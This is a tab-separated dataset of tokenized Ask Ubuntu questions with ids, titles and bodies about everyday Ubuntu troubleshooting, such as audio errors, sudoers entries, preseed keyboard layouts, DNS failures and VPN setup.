304362	are there other applications beside nitroshare to send files between computers on the same lan ?	i have tried nitroshare and had appreciated the simple way to install in order to transfer files between my devices with different os-es . but , given the fact that nitroshare has some bug/limitation ( as reported here ) i would like to know if there are other such programs available at a comparable level of required skills .
304363	entry in sudoers	i need the following entry for a autoresponder/vacation plugin for roundcube with plesk : www-data all=nopasswd : /opt/psa/bin/autoresponder but the system does n't recognize www-data as a user . only the `` www '' of www-data . i have ubuntu 12.04 on my server and i tried it on several machines . how can i handle this ?
304364	login to webmin with user has no password ( ssh )	i have an simple ubuntu 12.04 instance running on aws ec2 i have webmin installed and accessable , but am presented with a login requiring username and password . as part of the aws install , you do n't have a `` root '' user you can access , but an `` ubuntu '' user with sudo rights . this user does not have a password , access is via ssh key pair i do n't want to set a password for ubuntu user , preferring the security of ssh . how do i access webmin without needing to enter a password ? is it best i create a new userid with a password that is also a sudoer ? seems a bit daft given that is one reason i want webmin in the first place : - )
304365	detecting the fault in my sed command	i am creating a command to replace all instances of ; f. to , ( frequent ) . . so i wrote sed -i 's : ; [ : space : ] f. : , [ : space : ] ( frequent ) . : g ' with out any change then i wrote sed -i 's : ; f. : , ( frequent ) . : g ' to only find that it replaces all instances of f that has been written after a ; so its turning ; find to , ( frequent ) .ind will any one please let me know about my fault and how to rectify it ?
304372	how to fix the audio output now ? after restart it works once or twice and then stop working sound	everytime after restart the system it works and then suddently my sound output stop working . sun @ sun-to-be-filled-by-o-e-m : ~ $ speaker-test speaker-test 1.0.25 playback device is default stream parameters are 48000hz , s16_le , 1 channels using 16 octaves of pink noise alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave playback open error : -2 , no such file or directory edit sun @ sun-to-be-filled-by-o-e-m : ~ $ alsactl init found hardware : `` usb-audio '' `` usb mixer '' `` usb046d:082d '' `` '' `` '' hardware is initialized using a generic method sun @ sun-to-be-filled-by-o-e-m : ~ $ speaker-test speaker-test 1.0.25 playback device is default stream parameters are 48000hz , s16_le , 1 channels using 16 octaves of pink noise alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave playback open error : -2 , no such file or directory sun @ sun-to-be-filled-by-o-e-m : ~ $
304373	ubuntu 12.04 / 13.04 slower than windows 7 on ssd	i made a dualboot windows 7 / ubuntu 12.04 or 13.04 on my ssd samsung 840 250gb and ubuntu seems slower / less reactive than windows 7 . on windows 7 apps start faster than on ubuntu . is it normal ? if you need more info say it ; )
304382	ubuntu 12.10 freezes at reboot	i just moved from windows 7 to ubuntu . i installed ubuntu 12.10 on my acer aspire e1-471g laptop , the hardware is listed below : cpu : ivy bridge i3-3110m graphics : nvidia gt 630m & intel hd4000 ubuntu operated very well at first , but then it began to freeze at the purple background when the progress bar passed one dot of five when i shutdown or rebooted from the desktop . the command reboot from the terminal freezes too , but shutdown from the terminal is ok . i have installed bumblebee and gnome . i also installed windows , and used to use ubuntu 12.04 lts , but it froze randomly , especially when browsing the internet . it was said that ubuntu 12.10 could avoid that problem , so i installed 12.10 instead of 12.04 lts .
304383	youtube does n't work both on firefox and chrome with ubuntu 13.04	youtube does n't work both on firefox and chrome with ubuntu 13.04. it stops at the beggining . what can i do ?
304386	install a version of libreoffice or openoffice in ubuntu 12.04 that will produce powerpoint compatible presentations ?	i have seen some bug reports that say libreoffice 3.7 has fixed an issue with pptx files that makes them compatible with powerpoint ( i am testing with powerpoint 2010 ) . i have generated a presentation with libreoffice 3.5.2 and now i want to save it in a way that will be kept and shown correctly in powerpoint 2010. https : //bugs.freedesktop.org/show_bug.cgi ? id=41992 how can i install 3.7 libreoffice or any something-office version that will allow me to open the existing presentation and save it in a way that will be good for powerpoint 2010 ?
304389	how to debug executable ( using gdb ) that reads another file ?	i have a small application let 's call it program . in general to use this application i need to stream a file into it : ./program < file_with_data.txt how do i debug such program using dbg ? i do n't know how to pass data from file to program when it is controlled by dbg .
304391	how to auto add desktop icon for all new likewise-open users	i want to add a desktop icon to the desktop of every user that logs in . the system is connected to active directory using likewise-open , i do n't want to manualy add the desktop icons to every user , then first every user has to log in to the system , and new users do n't have it . is it possible to do this with a script that is triggered at a user login ( lightdm , session-setup-script= [ script|command ] ) ? but , i have now idea how to create a desktop icon using a script ( or with the terminal for that matter ) . i already have a .desktop file that is executable and does what it needs to do . i 'm running 12.04 lts
304396	missing `` show a launcher when not running '' option in kde	after messing with muon on ubuntu 13.04 lots of installed packages suddently got removed , including most of the kde packages . so i thought that installing ubuntu-desktop and kubuntu-desktop would restore most of them , at least the default ones , but it looks like someting is still missing because when i right-click an app icon at kde panel i do n't see an option to pin it to the panel , i.e . the `` show a launcher when not running '' entry is missing . which package do i install to get it back ?
304399	phones that support ubuntu touch ?	i saw an official list that said the galaxy nexus and nexus 4 phones support ubuntu . the thing is , there are all kinds of galaxy phones . nexus s , nexus s2 , nexus s3 , and i think s4 is out . does it work on all these ? some better than others ? thanks in advance !
304403	where is the software sources window ?	i am running ubuntu 13 , and would like to configure my updates and sources of software . every piece of documentation i see indicates that to do this i use a `` software sources '' window that is supposed to be available through system settings ( system settings - > software sources ) . the system settings window on ubuntu 13 does not appear to have a software sources selection . where is that window and how do i get to it ? ? ?
304408	ubuntu 13.04 is extremely slow	i have installed ubuntu in my desktop ( amd sempron le-250 2.20ghz 2gb ram ) and is really , really slow when doing simple things like looking for my computer specifications , the mouse moves slow , the graphic interface is slow and moving around the side bar in the left the icons moves extremely slow and buggy . i did something wrong ? the swap memory that i added is 3gb if that helps .
304411	how to run a command for all users in a specific group at login , any help would be appreciated	we are using ubuntu server 12.04.2 to host virtual devices in our office . our boss has written a program for ubuntu that logs all activity and time spent at a single workstation to monitor misusage of company assets . he has tasked me with getting this program to for users in the aduio group ( a group we created for receptionists and assistants ) . i have tried adding the command to the end of .profile ( eg # ! /bin/bash confidential -host `` ip '' -name $ user ) the programs starts in a kiosk mode ; only this program loads , there is no access to anything else as this user . when the program is started manually from the workstation it executes without a problem . how do i delay the startup and allow the essentials to load before running this program ?
304416	wireshark config/packet socket support	day three of using ubuntu and yet another question . today i installed wireshark . upon starting for the first time , i am told that `` no interface can be used for capturing in this system with the current configuration '' below that is `` capture help '' followed by `` how to capture - a step by step guide to a successful capture set up '' guide is as follows : how to set up a capture step 1 : are you allowed to do this ? step 2 : general setup step 3 : capture traffic `` sent to '' and `` sent from '' your local machine step 4 : capture traffic destined for machines other than your own step 5 : capture traffic using a remote machine step 1 , ok ! step 2 is where i am stuck ... you will need to make sure the machine on which you 're running is configured to support packet capture , e.g . you might need a capture driver installed . the way this is done differs from operating system to operating system . '' linux on linux , you need to have `` packet socket '' support enabled in your kernel ; see the `` packet socket '' item in the linux `` configure.help '' file . your distribution might enable this by default in the kernel . '' could somebody please tell me how i go about having packet socket support enabled please ? many thanks in anticipation
304418	lightdm fail to start automatically after last update	i have 12.04 lts , i do n't think i installed anything extraordinary lately , ( just uninstalled lxc-docker ) , but after last automatic update i am left with console . i can do service lightdm start and everything works fine . i checked upstart jobs , and lightdm is not there until i start it manually . i have followed http : //upstart.ubuntu.com/wiki/debugging and added verbose mode , but no information about lightdm . i also reconfigured lightdm , no change . i checked /var/logs but did not find anything useful in syslog , dmesg.. my question is , how to debug the problem ?
304419	please someone tell me what is the best and working remastering tool for ubuntu	i 've tried many remastering tools like uck & ubuntu builder both not worked can someone please suggest me a better and working remastering tool thanks for the help ...
304422	undefined reference to symbol 'fcpatternadddouble ' - issue with building program	i 'm ubuntu 13.04 user . i have n't been able to build/install japanese third-party software for artists called azdrawing . based on readme file , i executed make command in proper directory . at first it was going well , but after a while command-line aborted its work and displayed information : /usr/bin/ld : src/draw/cfont.o : undefined reference to symbol 'fcpatternadddouble' /usr/bin/ld : note : 'fcpatternadddouble ' is defined in dso /usr/lib/i386-linux-gnu/libfontconfig.so.1 so try adding it to the linker command line /usr/lib/i386-linux-gnu/libfontconfig.so.1 : could not read symbols : invalid operation collect2 : error : ld returned 1 exit status make : *** [ azdrawing ] error 1 what should i do ? i 'm unix beginner , so bear with me .
304423	x11 forwarding via `` ssh -x username @ hostname '' is slow , but fast using `` nxclient ''	as mentioned , when i do x11 forwarding using basic ssh -x username @ hostname it 's quite sluggish . but interestingly , when i use nxclient , it 's significantly faster . i 'd rather use ssh instead of nxclient , due to various reasons . i 've tried turning on compression and setting ciphers , ( i.e . ssh -x -c -c blowfish-cbc , arcfour username @ hostname ) but it 's still pretty sluggish . why is that ? how do i speed up ssh x11 forwarding to be up to par with nxclient ?
304427	a pre-13.04 program/script/window-manager used to let me resize windows by triple touching a window	in a previous ubuntu installation , there was a cool feature that let me use a three-finger touch to change the size of the active window . i do n't remember the version of ubuntu or the name of the feature , but i was wondering if it was possible to reactivate that feature in 13.04 . anybody know what i 'm talking about ? thanks in advance !
304429	i do n't want to store passwords in an unencrypted file	i 'm using ubuntu 12.04 lts on my developer machine and just realized that psql stores passwords in '~/.pgpass ' . furthermore this file is unencrypted . so anyone who has super user rights ( i.e . is in group sudo ) can access this file and read stored passwords . that 's the worst case it could be . instead i 'm wondering that psql does not ask for a password ( just modified a pg_hba.conf on a postgresql server ) and began to doubt about my administration skills . the documentation just tells us how to create the file and how it should look like.. i want to disable this file as soon as possible . but how ?
304433	ubuntu 13.04 lts doesnt recognize my 500gb external hard disk	previously i had windows 8 installed and changed back to ubuntu , i think ive messed up the hdd drive ( freecom 500gb )
304436	how can i use a tv as monitor ?	i 'm currently running ubuntu of the live cd . i have a 22 '' tv that is rarely used and i would like to connect it permanently to my computer as a sole monitor . my pc has only a vga and s video output . ( no dvi or hdmi ) the tv has vga , hdmi , & s video outputs . it has inbuilt freeview & dvd player . i have just tried it by powering up the tv and attaching the vga cable but no luck . it does not recognise the computer and all i get is the red freeview banner across the screen . could this be because ubuntu is running off the cd as opposed to the hdd . could you explain in steps any settings i need to change to get the pc to recognise the tv monitor . also do i just plug my audio speakers into the green port to get sound . thanks
304443	cant get compiz to work with llvmpipe	i have an ubuntu 13.04 vm on vmware esx and i want to rdp into unity . i have rdp working with gnome-fallback , but not with unity . i have tracked the problem down to compiz , unity requires . i cant start compiz on llvmpipe , but glxgears and other things work fine . i know we are getting mir in 13.10 to replace compiz+x11 , but it may be several releases before this is ready for primetime . any instructions out there to get compiz and llvmpipe to play nicely ?
304445	dns failure every few minutes in ubuntu 12.04	every few minutes , when i request a web page , i get a dns lookup failure . usually , if i just immediately refresh , the web page will come up . however , recently the dns failures have been persisting for long periods of time , even across restarts ( though eventually , it always starts working again , at least for a while ) . it happens in chrome , firefox , thunderbird , and update manager . when this happens , if i ping a host name like www.google.com , i get an unknown host message , but if i ping an ip address , it works fine . i 'm also running windows 7 in a vmware virtual machine on the ubuntu host , and if i switch to the vm , i have no problems , even when the host ubuntu is having dns failures . note , i 'm using a wired ethernet connection . thanks for any help .
304446	chrome on ubuntu running on virtualbox very slow	i 'm running ubuntu 12.04 ( 64 bit ) on virtualbox 4.2 on win 7 host . i 'm getting frequent annoying internet issues . i 'm using chrome ( and previously chromium ) and every no and then , the chrome just stop working . it either kills the request or delays it to quite some extent . i have to click refresh sometimes to get the page open . i have no idea why this is happening . in windows , my internet works flawless .
304448	what to do when my keyboard sensitivity decreases but returns to normal after re-log	i am having a random problem with both my keyboards . the keyboard will become so insensitive that i have to press really hard to to make it work . if i restart , or just log out , it resets and it acts normal . that mostly eliminates dirty keyboard issues . i use a wireless keyboard on a laptop ( hp dv6000 , 1.8 ghz amd 64 , 4g ram , dual monitor , running xubuntu 12.10 ) . but it also happens on the laptop keyboard . not however at the exact same time . for instance : i use the wireless keyboard primarily , but when it gets buggy , i can switch over to the laptop keyboard and use it . however , it will also eventually behave in the same manner ; not typing the character unless i press really hard ( hard enough i 'm afraid to break it ) and when i re-log , it works normally . i assume from this list of mish-mashed info that it most likely is some sort of driver issue ; re-logging fix , happens on either keyboard independently . i also `` seem '' to get crash reports when i re-log , but i ca n't read them or it does n't give the info i need to see to fix it . it seems to happen mostly on fb , but that 's circumstantial ; i post to fb most . it has happened while using abiword once , and when i was playing a game once or twice . once it happens , it is system wide , not just in the app/program needing keyboard input . i do n't remember it happening in terminal ever , for whatever that is worth . let me know what to provide to fix this , as it seems to be getting worse . [ edit ] update : 06/06/13 happened again while playing wow ( in wine ) . i saw this while searching for what keyboard drivers are in use on my system : http : //www.ehow.com/how_6800109_reinstall-ubuntu-using-command-line.html so , following the instructions there , i purged and re-installed xorg . perhaps something there was fouled up and needed re-installing . however , i found this : http : //askubuntu.com/questions/179801/where-are-laptop-keyboard-drivers-found that shows two places where keyboard drivers could be found . re-installing xorg might fix it if the keyboard drivers in use was/is the xorg one . but , if it is the kernel-based one , this might not work . also , i do not see any processes in use in top or lsmod that match up with any of those suggested there .
304456	skype 4 does n't function with ubuntu 13.04	can someone help me ? when i start skype with ubuntu 13.04 i get the this error : skype alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:612 : ( snd_pcm_dsnoop_open ) unable to open slave
304458	after installing ms fonts , the fonts are still not the same as on windows	fonts in firefox and chromium are still not the same as in windows ff and chrome after installing ms fonts . i mean the fonts that were missing are now displayed , but they are not the same as on windows . they are too `` wide '' or too `` narrow/high '' and e.g . if they are bold in ff on win in ubuntu 's ff they are super fat . how can i improve the displaying of fonts in ubuntu ff and chromium ? i do n't mind the wide default font in ubuntu os , but in browsers it 's not very nice to see it differently as 80 - 90 percent of visitors . bacause right now it is not as on windows . i am using 13.04 version of ubuntu . edit : page : www.bild.de if you look closer you can see the difference ( wider and not so high font in ubuntu ) :
304459	my ubuntu 12.04 lts system update takes too long	my ubuntu 12.04 lts system update takes too long ( too much time ) . finally a message comes up stating that there is a problem with internet connection and updating has failed . when i examined the terminal output , the following links has been 404 ( link not found , timeout ) errors . http : //ppa.launchpad.net ... .. precise/main sources precise/main amd64 packages precise/main i386 packages /crebs/ppa/ubuntu/dists/precise/main/source/sources /crebs/ppa/ubuntu/dists/precise/main/binary-amd64/packages /crebs/ppa/ubuntu/dists/precise/main/binary-i386/packages how can i remove those links ? is there any other solution ? please help me . thanks .
304460	wifi only accepts passwords of 5 or 13 characters	installed ubuntu 13.04 and when attempting to connecting to a home wifi network , the connect button is only click-able with passwords of 5 or 13 characters . is there a fix ?
304462	accidentally deleted the entire /usr folder	accidentally deleted the entire folder /usr . can i restore it or repair ?
304464	alt+f2 to run terminal fails to do anything	using alt+f2 , i type : sudo terminal but nothing happens . i am not aware of making any changes and this used to work . i am using ubuntu 12.04 lts 64 bit .
304467	12.04 ca n't find one particular wifi	i 've got the weirdest problem i 've ever had . i have a small hp netboox with linux 12.04 installed on it . for info : hp mini 5103 . i 've used it for weeks : it 's always worked perfectly . on multiple wifis , etc . since a 2 days i am in madrid , in a new house , with a new wifi . on my iphone i get the wifi perfectly and it works without a problem . yesterday i turned my computer on and weirdest thing ever : the home wifi was n't in the list . don'tget me wrong : it detected 35 fcking wifis , but not this one . i turned it off and on 5 times , both the wifi & the computer , nothing ... . any ideas ? thanks
304473	ubuntu preseed set norwegian keyboard ?	it 's been a couple of days now that i am trying to make a fully automated unattended installation . i managed to make it work with ubuntu/cobbler and a preseed file , but i can not set the correct keyboard layout which is norwegian in this case . i am doing the tests on a virtual machine and when i am going with a normal manual installation ( no preseed ) everything is working fine . when i am using the preseed file , i always end up with an `` english ( us ) '' keyboard no matter the many different options i have tried . i can change it manually with the `` dpkg-reconfigure keyboard-configuration '' command , but that 's not the case . it should be handled automatically using the preseed file . i am using debconf_debug=5 when the grub is loading , and as i see in `` /var/log/installer/syslog '' file after the installation has finished , the preseeding commands are accepted . can anyone help on this ? the preseed file i am using is following : d-i debian-installer/country string no d-i debian-installer/language string en_us : en d-i debian-installer/locale string en_us.utf-8 d-i console-setup/ask_detect boolean false d-i keyboard-configuration/layout select norwegian d-i keyboard-configuration/variant select norwegian d-i keyboard-configuration/modelcode string pc105 d-i keyboard-configuration/layoutcode string no d-i keyboard-configuration/xkb-keymap select no d-i netcfg/choose_interface select auto d-i netcfg/get_hostname string myhostname d-i netcfg/get_domain string simula.no d-i hw-detect/load_firmware boolean true d-i mirror/country string manual d-i mirror/http/hostname string ftp.uninett.no d-i mirror/http/directory string /ubuntu d-i mirror/http/proxy string http : //10.0.1.253:3142/ d-i mirror/codename string precise d-i mirror/suite string precise d-i clock-setup/utc boolean true d-i time/zone string europe/oslo d-i clock-setup/ntp boolean true d-i clock-setup/ntp-server string 10.0.1.254 d-i partman-auto/method string lvm partman-auto-lvm partman-auto-lvm/new_vg_name string vg0 d-i partman-auto/purge_lvm_from_device boolean true d-i partman-lvm/device_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-lvm/confirm boolean true d-i partman-lvm/confirm_nooverwrite boolean true d-i partman-auto-lvm/guided_size string max d-i partman-auto/choose_recipe select 30atomic d-i partman/default_filesystem string ext4 d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i partman/mount_style select uuid d-i passwd/root-login boolean false d-i passwd/make-user boolean true d-i passwd/user-fullname string vangelis d-i passwd/username string vangelis d-i passwd/user-password-crypted password $ 6 $ asdafdsdfasdfasdf d-i passwd/user-uid string d-i user-setup/allow-password-weak boolean false d-i passwd/user-default-groups string adm cdrom dialout lpadmin plugdev sambashare d-i user-setup/encrypt-home boolean false d-i apt-setup/restricted boolean true d-i apt-setup/universe boolean true d-i apt-setup/backports boolean true d-i apt-setup/services-select multiselect security d-i apt-setup/security_host string security.ubuntu.com d-i apt-setup/security_path string /ubuntu tasksel tasksel/first multiselect basic ubuntu server , openssh server d-i pkgsel/include string build-essential htop vim nmap ntp d-i pkgsel/upgrade select safe-upgrade d-i pkgsel/update-policy select none d-i pkgsel/updatedb boolean true d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true d-i finish-install/keep-consoles boolean false d-i finish-install/reboot_in_progress note d-i cdrom-detect/eject boolean true d-i debian-installer/exit/halt boolean false d-i debian-installer/exit/poweroff boolean false
304478	strange window positioning after launcher click	there is a strange and annoying thing in 12.04lts : sometimes ( quite often indeed ) when i click a launcher icon of an application that is running in a unity desktop different from the one i 'm actually working in this app 's window is repositioned somewhere between the desktops , e.g . the upper half of the window appears in the upper left desktop , and the lower half in the lower left desktop . unfortunately i do n't have enough reputation to post a screenshot , i hope you can imagine . i 've got the feeling that whether the problem occurs or not has got somethng to do with the total number of open windows but i 'm not sure about that . is there anything to prevent that ? thanks in advance
304481	how to take ownership over an existing ubuntu software center app ?	my name is michael tunnell and i am one of the project members of the download manager , uget . uget has been out of date in ubuntu for over a year and we are trying to fix that . ( you can verify my involvement by going to http : //uget.visuex.com/about ) the new developer portal and the my apps feature of the ubuntu site looks very useful for those who are creating new apps but uget has been around for years and there does n't seem to be a place where i can take ownership of the app in the usc . the usc has version 1.8.2 and we are currently on 1.10.3 ( it has been outdated for over a year ) we do n't want to submit a new app because uget is already in the usc and people have already installed it from there ... we just want to update the existing version to the current version and be able to do that as needed .
304483	transmission loses preferences	i 'm running ubuntu gnome 13.04 . i installed a shell extension transmission daemon indicator but that requires transmission to be started at the system startup . so i made an entry in startup application for transmission pointing to /usr/bin/transmission-gtk . the transmission starts perfectly but i think it loses it 's preferences that is it starts up from the beginning asking to accept the security notice . this also unchecks the enable web client and show transmission icon in notification area . i think i 'm not setting up the startup entry . please help with the issue .
304484	`` reboot and select proper boot device '' error after clean ubuntu 13.04 install	i am having the same problem as clean install of ubuntu wo n't boot [ reboot and select proper boot device ] where a fresh ubuntu install completes but will not boot . i get a reboot and select proper boot device error , first with xubuntu 13.10 , later with xubuntu 13.04 , and finally also with ubuntu 13.04 . asus motherboard z77 , intel chipset . standard internal sata 500gb hd . 64-bit . it was running ubuntu 12.04ltc until i tried this upgrade . i have re-installed ubuntu 13.04 from scratch different ways : with lvm , without lvm , with the default partitions , with my own partitions , with ext3 or ext4 , alongside , replace , run boot-repair from usb installation media upgrade , run boot-repair again no difference . this starts from the ubuntu-13.04-desktop-amd64.iso and unetbootin as suggested on the official instructions for usb thumb drive creation from os x . that part all works fine ( booting the usb on the pc and trying ubuntu and/or installing from there on the pc hd . ) i have no cd drive on this pc , but i suppose i could get one . i would rather find some linux install that works from usb like i 've always done . after running boot-repair twice , in the asus bios i now see three different uefi boot options in the priority list , and they are all labelled exactly the same : ubuntu ( p6 : wdc wd5000aakx-00u6aa0 ) then there 's a non-uefi option : p6 : wdc wd5000aakx-00u6aa0 ( 476940mb ) and a fifth option appeared after the first boot-repair : windows boot manager ( p6 : wdc wd5000aakx-00u6aa0 ) i have tried all 5 of these , and i get exactly the same error . i have never had windows installed on this hd . asus is calling it windows boot manager but i presume that 's a mistaken label for whatever boot-repair did . i can boot on usb and run gparted and it looks great . the partitions all look normal . needs a master boot record wipe/redo ?
304485	ubuntu 12.04 and openvpn - how to connect automatically ?	a noob question about openvpn . my laptop runs ubuntu 12.04 and i connect to a variety of wifi access points as i move around . i 've setup an account with airvpn and created two openvpn connections in network manager ( udp and tcp ) . i 'd like the laptop to automatically connect/disconnect to the airvpn whevener the wifi or lan network comes up/down . the goal is to have all traffic go through the vpn . i do n't generally access intranet sites - just localhost for development . i 've read some other q 's but alot seem to be about server configuration . i 'm looking for just the configuration for my laptop . this might be a start , but not sure the best way to tie it in . how to connect to vpn from the command line in linux ? thanks for the help ! mike
304490	how to access multiple online cloud storage accounts from a single program ?	what would be a good program to use for accessing multiple online file storage accounts like ubuntu one , google drive , etc all from the same program ? i am running ubuntu 12.04 32 bit on an acer 2x intel ( r ) core ( tm ) 2 duo cpu t5450 @ 1.66ghz and 3 gb of ram .
304493	is there some plugin for gnome-screensaver to control banshee or another media player from the lock screen ?	is there some way to control a media player and the system volume from the lock screen ( e.g . after waking from sleep ) ?
